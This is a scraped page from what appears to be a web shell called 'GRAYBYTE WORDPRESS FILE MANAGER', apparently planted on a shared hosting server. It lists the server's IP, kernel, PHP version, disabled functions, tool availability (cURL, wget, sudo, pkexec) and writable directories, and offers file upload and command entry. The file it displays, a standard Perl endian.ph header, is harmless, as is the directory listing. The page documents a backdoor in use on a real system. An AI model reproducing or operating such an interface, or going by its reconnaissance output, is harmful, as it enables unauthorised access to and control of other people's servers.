GRAYBYTE WORDPRESS FILE MANAGER3299

Server IP : 162.254.39.133 / Your IP : 216.73.216.176
System : Linux premium287.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
PHP Version : 8.1.33
Disable Function : mail
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/lib64/perl5/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /lib64/perl5//endian.ph
require '_h2ph_pre.ph';

no warnings qw(redefine misc);

unless(defined(&_ENDIAN_H)) {
    eval 'sub _ENDIAN_H () {1;}' unless defined(&_ENDIAN_H);
    require 'features.ph';
    eval 'sub __LITTLE_ENDIAN () {1234;}' unless defined(&__LITTLE_ENDIAN);
    eval 'sub __BIG_ENDIAN () {4321;}' unless defined(&__BIG_ENDIAN);
    eval 'sub __PDP_ENDIAN () {3412;}' unless defined(&__PDP_ENDIAN);
    require 'bits/endian.ph';
    unless(defined(&__FLOAT_WORD_ORDER)) {
	eval 'sub __FLOAT_WORD_ORDER () { &__BYTE_ORDER;}' unless defined(&__FLOAT_WORD_ORDER);
    }
    if(defined(&__USE_MISC)) {
	eval 'sub LITTLE_ENDIAN () { &__LITTLE_ENDIAN;}' unless defined(&LITTLE_ENDIAN);
	eval 'sub BIG_ENDIAN () { &__BIG_ENDIAN;}' unless defined(&BIG_ENDIAN);
	eval 'sub PDP_ENDIAN () { &__PDP_ENDIAN;}' unless defined(&PDP_ENDIAN);
	eval 'sub BYTE_ORDER () { &__BYTE_ORDER;}' unless defined(&BYTE_ORDER);
    }
    if((defined(&__BYTE_ORDER) ? &__BYTE_ORDER : undef) == (defined(&__LITTLE_ENDIAN) ? &__LITTLE_ENDIAN : undef)) {
	eval 'sub __LONG_LONG_PAIR {
	    my($HI, $LO) = @_;
    	    eval q($LO, $HI);
	}' unless defined(&__LONG_LONG_PAIR);
    }
 elsif((defined(&__BYTE_ORDER) ? &__BYTE_ORDER : undef) == (defined(&__BIG_ENDIAN) ? &__BIG_ENDIAN : undef)) {
	eval 'sub __LONG_LONG_PAIR {
	    my($HI, $LO) = @_;
    	    eval q($HI, $LO);
	}' unless defined(&__LONG_LONG_PAIR);
    }
    if(defined (&__USE_MISC)  && !defined (&__ASSEMBLER__)) {
	require 'bits/byteswap.ph';
	require 'bits/uintn-identity.ph';
	if((defined(&__BYTE_ORDER) ? &__BYTE_ORDER : undef) == (defined(&__LITTLE_ENDIAN) ? &__LITTLE_ENDIAN : undef)) {
	    eval 'sub htobe16 {
	        my($x) = @_;
    		eval q( &__bswap_16 ($x));
	    }' unless defined(&htobe16);
	    eval 'sub htole16 {
	        my($x) = @_;
    		eval q( &__uint16_identity ($x));
	    }' unless defined(&htole16);
	    eval 'sub be16toh {
	        my($x) = @_;
    		eval q( &__bswap_16 ($x));
	    }' unless defined(&be16toh);
	    eval 'sub le16toh {
	        my($x) = @_;
    		eval q( &__uint16_identity ($x));
	    }' unless defined(&le16toh);
	    eval 'sub htobe32 {
	        my($x) = @_;
    		eval q( &__bswap_32 ($x));
	    }' unless defined(&htobe32);
	    eval 'sub htole32 {
	        my($x) = @_;
    		eval q( &__uint32_identity ($x));
	    }' unless defined(&htole32);
	    eval 'sub be32toh {
	        my($x) = @_;
    		eval q( &__bswap_32 ($x));
	    }' unless defined(&be32toh);
	    eval 'sub le32toh {
	        my($x) = @_;
    		eval q( &__uint32_identity ($x));
	    }' unless defined(&le32toh);
	    eval 'sub htobe64 {
	        my($x) = @_;
    		eval q( &__bswap_64 ($x));
	    }' unless defined(&htobe64);
	    eval 'sub htole64 {
	        my($x) = @_;
    		eval q( &__uint64_identity ($x));
	    }' unless defined(&htole64);
	    eval 'sub be64toh {
	        my($x) = @_;
    		eval q( &__bswap_64 ($x));
	    }' unless defined(&be64toh);
	    eval 'sub le64toh {
	        my($x) = @_;
    		eval q( &__uint64_identity ($x));
	    }' unless defined(&le64toh);
	} else {
	    eval 'sub htobe16 {
	        my($x) = @_;
    		eval q( &__uint16_identity ($x));
	    }' unless defined(&htobe16);
	    eval 'sub htole16 {
	        my($x) = @_;
    		eval q( &__bswap_16 ($x));
	    }' unless defined(&htole16);
	    eval 'sub be16toh {
	        my($x) = @_;
    		eval q( &__uint16_identity ($x));
	    }' unless defined(&be16toh);
	    eval 'sub le16toh {
	        my($x) = @_;
    		eval q( &__bswap_16 ($x));
	    }' unless defined(&le16toh);
	    eval 'sub htobe32 {
	        my($x) = @_;
    		eval q( &__uint32_identity ($x));
	    }' unless defined(&htobe32);
	    eval 'sub htole32 {
	        my($x) = @_;
    		eval q( &__bswap_32 ($x));
	    }' unless defined(&htole32);
	    eval 'sub be32toh {
	        my($x) = @_;
    		eval q( &__uint32_identity ($x));
	    }' unless defined(&be32toh);
	    eval 'sub le32toh {
	        my($x) = @_;
    		eval q( &__bswap_32 ($x));
	    }' unless defined(&le32toh);
	    eval 'sub htobe64 {
	        my($x) = @_;
    		eval q( &__uint64_identity ($x));
	    }' unless defined(&htobe64);
	    eval 'sub htole64 {
	        my($x) = @_;
    		eval q( &__bswap_64 ($x));
	    }' unless defined(&htole64);
	    eval 'sub be64toh {
	        my($x) = @_;
    		eval q( &__uint64_identity ($x));
	    }' unless defined(&be64toh);
	    eval 'sub le64toh {
	        my($x) = @_;
    		eval q( &__bswap_64 ($x));
	    }' unless defined(&le64toh);
	}
    }
}
1;

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
October 31 2025 16:26:44
root / root
0555
B
--
July 29 2025 01:26:46
root / root
0755
CORE
--
July 29 2025 01:26:47
root / root
0755
Devel
--
July 29 2025 01:26:47
root / root
0755
File
--
July 29 2025 01:26:46
root / root
0755
Hash
--
July 29 2025 01:26:46
root / root
0755
I18N
--
July 29 2025 01:26:46
root / root
0755
IO
--
July 29 2025 01:26:46
root / root
0755
IPC
--
July 28 2025 08:07:09
root / root
0755
PerlIO
--
July 29 2025 01:26:46
root / root
0755
Sys
--
July 29 2025 01:26:46
root / root
0755
Tie
--
July 28 2025 08:07:09
root / root
0755
Time
--
July 29 2025 01:26:47
root / root
0755
asm
--
July 29 2025 01:26:46
root / root
0755
asm-generic
--
July 29 2025 01:26:46
root / root
0755
auto
--
July 28 2025 08:07:09
root / root
0755
bits
--
July 29 2025 01:26:46
root / root
0755
gnu
--
July 29 2025 01:26:46
root / root
0755
linux
--
July 29 2025 01:26:46
root / root
0755
machine
--
July 28 2025 08:07:18
root / root
0755
sys
--
July 29 2025 01:26:46
root / root
0755
vendor_perl
--
October 08 2025 12:24:25
root / root
0755
B.pm
30.72 KB
July 28 2025 08:07:09
root / root
0644
Config.pm
3.123 KB
July 28 2025 08:07:09
root / root
0644
Config.pod
250.868 KB
July 28 2025 08:07:09
root / root
0644
Config_git.pl
0.399 KB
July 28 2025 08:07:09
root / root
0644
Config_heavy.pl
55.327 KB
July 28 2025 08:07:09
root / root
0644
DynaLoader.pm
24.631 KB
July 28 2025 08:07:09
root / root
0644
Errno.pm
6.704 KB
July 28 2025 08:07:09
root / root
0644
Fcntl.pm
3.949 KB
July 28 2025 08:07:09
root / root
0644
GDBM_File.pm
1.515 KB
July 28 2025 08:07:09
root / root
0644
IO.pm
1.419 KB
July 28 2025 08:07:09
root / root
0644
NDBM_File.pm
2.441 KB
July 28 2025 08:07:09
root / root
0644
O.pm
4.109 KB
July 28 2025 08:07:09
root / root
0644
ODBM_File.pm
2.327 KB
July 28 2025 08:07:09
root / root
0644
Opcode.pm
15.521 KB
July 28 2025 08:07:09
root / root
0644
POSIX.pm
19.725 KB
July 28 2025 08:07:09
root / root
0644
POSIX.pod
71.978 KB
July 28 2025 08:07:09
root / root
0644
SDBM_File.pm
3.458 KB
July 28 2025 08:07:09
root / root
0644
_h2ph_pre.ph
28.57 KB
July 28 2025 08:07:18
root / root
0644
arybase.pm
2.75 KB
July 28 2025 08:07:09
root / root
0644
attributes.pm
16.532 KB
July 28 2025 08:07:09
root / root
0644
endian.ph
4.356 KB
July 28 2025 08:07:18
root / root
0644
features.ph
13.371 KB
July 28 2025 08:07:18
root / root
0644
lib.pm
5.865 KB
July 28 2025 08:07:09
root / root
0644
mro.pm
9.862 KB
July 28 2025 08:07:09
root / root
0644
ops.pm
0.974 KB
July 28 2025 08:07:09
root / root
0644
perllocal.pod
10.698 KB
March 17 2024 05:04:51
root / root
0644
re.pm
22.155 KB
July 28 2025 08:07:09
root / root
0644
signal.ph
3.302 KB
July 28 2025 08:07:18
root / root
0644
stdarg.ph
2.803 KB
July 28 2025 08:07:18
root / root
0644
stdc-predef.ph
0.82 KB
July 28 2025 08:07:18
root / root
0644
stddef.ph
12.082 KB
July 28 2025 08:07:18
root / root
0644
syscall.ph
0.084 KB
July 28 2025 08:07:18
root / root
0644
syslimits.ph
0.441 KB
July 28 2025 08:07:18
root / root
0644
syslog.ph
0.083 KB
July 28 2025 08:07:18
root / root
0644
wait.ph
0.081 KB
July 28 2025 08:07:18
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF